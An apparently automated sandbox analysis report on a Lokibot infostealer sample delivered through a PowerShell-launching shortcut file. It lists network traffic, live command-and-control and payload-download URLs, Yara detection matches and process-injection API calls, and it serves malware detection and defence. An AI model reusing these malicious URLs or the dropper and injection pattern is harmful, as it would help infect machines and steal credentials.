Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:59 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:00 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:02 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:03 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:04 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:05 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:06 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:07 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:08 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:09 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:10 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:11 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:12 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:13 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:14 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:15 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:16 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:17 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:18 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:18 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:19 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:20 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:21 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:22 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:23 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:24 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:25 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:25 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:26 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:27 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:28 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:29 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:30 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:31 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:32 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:34 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:35 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:36 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:37 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:38 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:39 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:39 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:40 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:41 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:42 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:43 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:44 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: mjtjewi.exe, 00000005.00000002.2638675432.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mjtjewi.exe, 00000005.00000002.2638412976.00000000004A0000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php
Source: mjtjewi.exe, 00000005.00000002.2638675432.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://freighteighttwocam.ddns.net/mdifygidj/five/fre.phpy
Source: powershell.exe, 00000000.00000002.1507180884.0000020C63C17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://microsoft.coF
Source: powershell.exe, 00000000.00000002.1499571714.0000020C5BA82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1499571714.0000020C5B93F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4BB02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4B8D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4BB02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: mjtjewi.exe, mjtjewi.exe, 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: powershell.exe, 00000000.00000002.1507180884.0000020C63C17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: powershell.exe, 00000000.00000002.1507180884.0000020C63C17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4CEF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sodiumlaurethsulfatedesyroyer.com
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4B8D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4BB02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4C502000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1499571714.0000020C5BA82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1499571714.0000020C5B93F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4CC2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1464066335.0000020C4CEEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sodiumlaurethsulfatedesyroyer.com
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4B8D1000.00000004.00000800.00020000.00000000.sdmp, Comprobante.lnk.lnk	String found in binary or memory: https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrg

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.11:49710 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: mjtjewi.exe PID: 6956, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: mjtjewi.exe PID: 876, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

PE file contains section with special chars

Source: mjtjewi.exe.0.dr

Static PE information: section name: j1CM!e^U

PE file has nameless sections

Source: mjtjewi.exe.0.dr

Static PE information: section name:

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Desktop\mjtjewi.exe

Jump to dropped file

Windows shortcut file (LNK) contains suspicious command line arguments

Source: Comprobante.lnk.lnk

Contains functionality to call native functions

Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9DBB0 NtResumeThread,	4_2_0AC9DBB0
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9DB59 NtResumeThread,	4_2_0AC9DB59
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9D9F8 NtReadVirtualMemory,	4_2_0AC9D9F8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9DF28 NtSetContextThread,	4_2_0AC9DF28
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9DDD0 NtWriteVirtualMemory,	4_2_0AC9DDD0
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9DBA8 NtResumeThread,	4_2_0AC9DBA8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9D9F0 NtReadVirtualMemory,	4_2_0AC9D9F0
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9DF21 NtSetContextThread,	4_2_0AC9DF21
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9DDC9 NtWriteVirtualMemory,	4_2_0AC9DDC9

Detected potential crypto function

Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01522D20	4_2_01522D20
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0152B5B8	4_2_0152B5B8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0152B858	4_2_0152B858
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0152D038	4_2_0152D038
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_015224D8	4_2_015224D8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_015208E1	4_2_015208E1
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01523760	4_2_01523760
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01526F28	4_2_01526F28
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_015246C0	4_2_015246C0
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01526D58	4_2_01526D58
